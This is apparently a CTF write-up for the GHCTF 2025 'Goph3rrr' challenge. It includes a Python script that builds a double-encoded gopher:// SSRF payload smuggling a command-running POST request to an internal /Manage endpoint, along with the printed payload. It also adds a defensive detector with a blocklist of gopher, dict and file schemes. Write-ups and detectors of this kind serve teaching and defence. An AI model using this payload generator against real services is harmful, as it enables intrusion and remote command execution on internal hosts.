
Suddenly felt like it, so here is a quick review of the freshman-contest challenges I wrote up before = v =

[GHCTF 2025]Goph3rrr

Topic tested: Gopher protocol forgery

```python
from urllib.parse import quote

# Command to execute
command = "ls"  # can be replaced with any other command

# Build the POST request body
request_body = f"cmd={quote(command)}"
content_length = len(request_body)

# Build the full HTTP request
http_request = f"""POST /Manage HTTP/1.1
Host: 0.0.0.0:5000
Content-Type: application/x-www-form-urlencoded
Content-Length: {content_length}

{request_body}"""

# Convert to gopher format (add the "_" prefix, use CRLF line endings)
gopher_payload = "_" + http_request.replace("\n", "\r\n")

# First URL encoding (encode everything, including "/")
encoded_payload = quote(gopher_payload, safe='')
final_url = f"gopher://0.0.0.0:5000/{encoded_payload}"  # remember: this gopher://0.0.0.0:5000/ part should not be modified

# Second URL encoding of the whole URL
double_encoded_payload = quote(final_url)

print(f"Final payload: url={double_encoded_payload}")
```

Output:

```
url=gopher%3A//0.0.0.0%3A5000/_POST%2520%252FManage%2520HTTP%252F1.1%250D%250AHost%253A%25200.0.0.0%253A5000%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25206%250D%250A%250D%250Acmd%253Dls
```

This needs a small adjustment:

```
url=gopher://0.0.0.0:8000/_POST%2520%252FManage%2520HTTP%252F1.1%250D%250AHost%253A%25200.0.0.0%253A5000%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25206%250D%250A%250D%250Acmd%253Dls
```

Changes made:

```
# Port:
8000 5000 8080 8888

# The first half (gopher://host:port/) is not double-encoded
```
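Seen from the server side, the thing that lets this payload through is that the `url=` parameter is validated (if at all) before its nested percent-encoding is removed, so a `gopher://` URL pointing at a local port, with a whole HTTP request smuggled in the path, looks like an opaque string. The example below is added here and is not part of the original writeup or the challenge's code: it peels off every layer of percent-encoding, then applies a scheme blocklist, an internal-address check and a CR/LF check to the normalised URL. `BLOCKED_SCHEMES`, `inspect_url_param` and the `MAX_DECODE_ROUNDS` cap are names and choices made for this example; the payload string is the one produced above, with the `url=` prefix removed.

```python
# Added example (not from the original writeup): a server-side check that
# catches the gopher:// SSRF payload class discussed above by peeling off
# nested percent-encoding before validating the URL. Names such as
# BLOCKED_SCHEMES and inspect_url_param are assumptions made here.
from urllib.parse import unquote, urlsplit
import ipaddress

# Schemes a fetch-by-URL feature should never hand to its HTTP client.
BLOCKED_SCHEMES = {"gopher", "dict", "file", "ftp", "tftp", "ldap"}
MAX_DECODE_ROUNDS = 5


def fully_decode(value: str, max_rounds: int = MAX_DECODE_ROUNDS):
    """Percent-decode repeatedly until the string stops changing.

    Returns (decoded_value, rounds_applied). One quote() pass is undone by
    one round; the writeup's double-encoded payload needs two.
    """
    rounds = 0
    while "%" in value and rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:          # a literal '%' not followed by hex digits
            break
        value = decoded
        rounds += 1
    return value, rounds


def is_internal_host(host: str) -> bool:
    """True for loopback, unspecified (0.0.0.0), link-local and RFC 1918 hosts."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                  # a DNS name; resolve-then-check is out of scope here
    return ip.is_loopback or ip.is_unspecified or ip.is_link_local or ip.is_private


def inspect_url_param(raw: str) -> dict:
    """Normalise a user-supplied url= parameter and list SSRF indicators."""
    decoded, rounds = fully_decode(raw)
    parts = urlsplit(decoded)
    findings = []
    if rounds > 1:
        findings.append(f"nested percent-encoding ({rounds} rounds)")
    if parts.scheme.lower() in BLOCKED_SCHEMES:
        findings.append(f"blocked scheme: {parts.scheme}")
    if parts.hostname and is_internal_host(parts.hostname):
        findings.append(f"internal host: {parts.hostname}")
    if "\r" in decoded or "\n" in decoded:
        findings.append("CR/LF in decoded URL (smuggled request body)")
    return {"decoded": decoded, "rounds": rounds, "findings": findings}


# The payload string from the writeup above, with the leading 'url=' removed.
WRITEUP_PAYLOAD = (
    "gopher://0.0.0.0:8000/_POST%2520%252FManage%2520HTTP%252F1.1%250D%250A"
    "Host%253A%25200.0.0.0%253A5000%250D%250AContent-Type%253A%2520"
    "application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25206"
    "%250D%250A%250D%250Acmd%253Dls"
)
# Constructed benign input for comparison.
BENIGN_URL = "https://example.com/report?id=42"

if __name__ == "__main__":
    for sample in (WRITEUP_PAYLOAD, BENIGN_URL):
        result = inspect_url_param(sample)
        verdict = "REJECT" if result["findings"] else "allow"
        print(verdict, result["findings"])
```

Run stand-alone, the writeup payload is rejected on all four counts (two decoding rounds, `gopher` scheme, host `0.0.0.0`, CR/LF in the path) while the benign URL passes with no findings. The decode loop is the important part: a single `unquote()` before validation would still see a `gopher://` URL here, but would miss a payload whose scheme was itself double-encoded, which is exactly the first variant the generator above produced.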